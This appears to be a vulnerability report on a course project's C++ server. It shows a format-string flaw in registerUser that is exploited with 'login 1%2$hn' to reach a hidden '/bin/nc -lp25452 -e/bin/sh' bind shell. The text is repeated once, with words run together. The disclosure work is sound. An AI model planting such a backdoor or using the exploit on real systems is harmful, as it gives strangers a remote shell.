Furthermore the registerUser is called each time the login command is issued by a user and name is the parameter passed to the login command. Thus the user could pass a valid format string to execute a format string attack and overwrite login with a non zero value.
Then, in the function user_already_logged if the getLogin (which returns the value of login defined in registerUser) of the current user (the one passed by login earlier) is non-zero a snippet of code that will executes /bin/nc -lp25452 -e/bin/sh is called.
Exploit:
The following sequence of commands will execute this vulnerability:
login 1%2$hn
login q
The first login will rewrite the login variable. The second is here to call the function user_already_login which checks if this client has already executed login with an other username.
In the function
registerUser
a user controlled input is used as a format string:https://github.com/xavierpantet/my_ass_on_your_grass/blob/355151c90db67b16c7d5877d37a71ef1b92c1f78/src/services/authentication/AuthenticationService.cpp#L16-L20
Furthermore the
registerUser
is called each time thelogin
command is issued by a user andname
is the parameter passed to thelogin
command. Thus the user could pass a valid format string to execute a format string attack and overwritelogin
with a non zero value.Then, in the function
user_already_logged
if thegetLogin
(which returns the value oflogin
defined inregisterUser
) of the current user (the one passed bylogin
earlier) is non-zero a snippet of code that will executes/bin/nc -lp25452 -e/bin/sh
is called.https://github.com/xavierpantet/my_ass_on_your_grass/blob/5265459c2eaf05b87a79ccbd51487ce17b85405b/src/commands/Commands.cpp#L280-L295
Exploit: The following sequence of commands will execute this vulnerability:
The first login will rewrite the
login
variable. The second is here to call the functionuser_already_login
which checks if this client has already executedlogin
with an other username.